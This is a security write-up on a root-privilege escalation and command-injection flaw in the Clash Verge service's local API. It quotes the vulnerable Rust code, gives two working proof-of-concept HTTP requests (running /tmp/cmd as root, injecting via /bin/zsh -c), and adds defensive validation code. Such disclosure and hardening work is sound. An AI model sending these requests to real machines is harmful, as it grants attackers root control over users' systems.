Clash Verge LPE
Q1ngShan Lv3

LPE

https://github.com/clash-verge-rev/clash-verge-rev/issues/3428
From the GitHub issue we can tell that clash-verge-service has a local privilege escalation (LPE).

clash-verge-service is a process independent of the CVR application; once granted administrator authorization it is used to silently launch other services and is not shut down with CVR. After CVR exits, the service-mode process `clash-verge-service` keeps running in the background. It does not affect the system.

When Clash Verge is installed, a service running with root privileges is installed by default to do the scheduling in the background.

https://github.com/clash-verge-rev/clash-verge-rev/blob/dev/src-tauri/src/core/service.rs
The service opens a local HTTP server.
Port 33331 is the server service; port 33211 is the service's own API.

Some of its functionality can be invoked through that API.

In the start_clash endpoint you can see the configuration parameter bin_path.

Locate the service code:
https://github.com/clash-verge-rev/clash-verge-service/blob/main/src/service/mod.rs
Follow it into
https://github.com/clash-verge-rev/clash-verge-service/blob/main/src/service/core.rs

and finally reach the test_config_file method.

```rust
pub fn test_config_file(&self) -> Result<(), String> {
    let config = match self
        .clash_status
        .inner
        .lock()
        .unwrap()
        .runtime_config
        .lock()
        .unwrap()
        .clone()
    {
        Some(config) => config,
        None => return Err("Runtime config is not set".to_string()),
    };

    // All three values come from the runtime config that /start_clash sets.
    let bin_path = config.bin_path.as_str();
    let config_dir = config.config_dir.as_str();
    let config_file = config.config_file.as_str();
    let args = vec!["-d", config_dir, "-f", config_file, "-t"];
    ......
    // bin_path is spawned as-is by the root service: no allowlist, no ownership check.
    let result = process::spawn_process_debug(bin_path, &args)
        .map_err(|e| format!("Failed to execute config test: {}", e))?;
    ......
    println!("Config test passed successfully");
    Ok(())
}
```

In spawn_process_debug, bin_path is executed directly, with the fixed arguments appended to it; nothing checks where the binary lives or who can write it.

PoC

```http
POST /start_clash HTTP/1.1
Host: 127.0.0.1:33211
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 390

{"core_type":"verge-mihomo","bin_path":"/tmp/cmd","config_dir":"","config_file":"","log_file":""}
```

The binary is executed directly with root privileges.

RCE

Command injection

```http
POST /start_clash HTTP/1.1
Host: 127.0.0.1:33211
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 114

{"core_type":"verge-mihomo","bin_path":"/bin/zsh","config_dir":"-c","config_file":"whoami> /tmp/aa","log_file":""}
```
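As an added hardening example (not clash-verge-service's own code and not its upstream fix), the Rust module below vets the three fields of a /start_clash request before a root service would hand them to spawn_process_debug. It covers both findings on this page: bin_path (the LPE request pointing at /tmp/cmd) must name a known core binary sitting directly in a trusted install directory and, on disk, resolve to a regular file that only its owner can write; config_dir and config_file (the command-injection request with "-c") must be absolute paths under the service's config root and may never begin with "-". The trusted core directory, the config root and ALLOWED_CORE_NAMES are assumptions made for the example.

```rust
// Added hardening example (not clash-verge-service's own code). It vets the
// /start_clash fields before a root service would pass them to spawn.
use std::fs;
use std::path::{Component, Path, PathBuf};

/// Core binaries the service may launch. Assumed names for the example.
pub const ALLOWED_CORE_NAMES: &[&str] = &["verge-mihomo", "verge-mihomo-alpha"];

/// Request fields as they arrive in the JSON body (log_file omitted here).
pub struct StartClashRequest<'a> {
    pub bin_path: &'a str,
    pub config_dir: &'a str,
    pub config_file: &'a str,
}

/// Lexical checks on bin_path: absolute, no "..", sitting directly in
/// `core_dir` (the install directory the service trusts, an assumption) and
/// named like one of the known cores. A request naming /tmp/cmd or /bin/zsh
/// fails here before anything touches the filesystem.
pub fn check_bin_path(requested: &str, core_dir: &Path) -> Result<PathBuf, String> {
    let p = Path::new(requested);
    if requested.is_empty() || !p.is_absolute() {
        return Err("bin_path must be an absolute path".to_string());
    }
    if p.components().any(|c| matches!(c, Component::ParentDir)) {
        return Err("bin_path must not contain '..'".to_string());
    }
    if p.parent() != Some(core_dir) {
        return Err(format!("bin_path must live directly in {}", core_dir.display()));
    }
    let name = p.file_name().and_then(|n| n.to_str()).unwrap_or("");
    if !ALLOWED_CORE_NAMES.contains(&name) {
        return Err(format!("'{}' is not an allowed core binary", name));
    }
    Ok(p.to_path_buf())
}

/// Filesystem checks: resolve symlinks and re-run the lexical checks on the
/// resolved path, require a regular file, and on Unix refuse a binary that
/// group or others can modify (a user-writable core would be the LPE again).
pub fn check_bin_path_on_disk(requested: &str, core_dir: &Path) -> Result<PathBuf, String> {
    let lexical = check_bin_path(requested, core_dir)?;
    let real_dir = fs::canonicalize(core_dir).map_err(|e| e.to_string())?;
    let real = fs::canonicalize(&lexical)
        .map_err(|e| format!("cannot resolve {}: {}", lexical.display(), e))?;
    check_bin_path(real.to_str().ok_or("non-UTF-8 path")?, &real_dir)?;
    let meta = fs::metadata(&real).map_err(|e| e.to_string())?;
    if !meta.is_file() {
        return Err("bin_path is not a regular file".to_string());
    }
    #[cfg(unix)]
    {
        use std::os::unix::fs::PermissionsExt;
        if meta.permissions().mode() & 0o022 != 0 {
            return Err("bin_path is writable by group or others".to_string());
        }
    }
    Ok(real)
}

/// config_dir and config_file become argv entries, so a value such as "-c"
/// must never reach the child. Require absolute paths under `config_root`.
pub fn check_config_arg(value: &str, config_root: &Path) -> Result<PathBuf, String> {
    let p = Path::new(value);
    if value.is_empty() || value.starts_with('-') || !p.is_absolute() {
        return Err(format!("'{}' is not an acceptable config path", value));
    }
    if p.components().any(|c| matches!(c, Component::ParentDir)) || !p.starts_with(config_root) {
        return Err(format!("config path must stay under {}", config_root.display()));
    }
    Ok(p.to_path_buf())
}

/// Vetted equivalent of the argv that test_config_file builds.
pub fn build_test_command(
    req: &StartClashRequest,
    core_dir: &Path,
    config_root: &Path,
) -> Result<(PathBuf, Vec<String>), String> {
    let bin = check_bin_path_on_disk(req.bin_path, core_dir)?;
    let dir = check_config_arg(req.config_dir, config_root)?;
    let file = check_config_arg(req.config_file, config_root)?;
    let args = vec![
        "-d".to_string(),
        dir.to_string_lossy().into_owned(),
        "-f".to_string(),
        file.to_string_lossy().into_owned(),
        "-t".to_string(),
    ];
    Ok((bin, args))
}

fn main() {
    // Replay the two request bodies from the write-up against the lexical checks.
    let core_dir = Path::new("/opt/clash-verge/core"); // assumed trusted directory
    for bad in ["/tmp/cmd", "/bin/zsh"] {
        println!("{bad}: {:?}", check_bin_path(bad, core_dir));
    }
    println!("-c: {:?}", check_config_arg("-c", Path::new("/etc/clash-verge")));
}
```

Argument validation only limits what an unauthenticated local caller can make the root service execute; the endpoint on 127.0.0.1:33211 is still reachable by every local user, so these checks belong alongside authentication of the caller (for example a token that only the privileged installer can provision), not in place of it.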
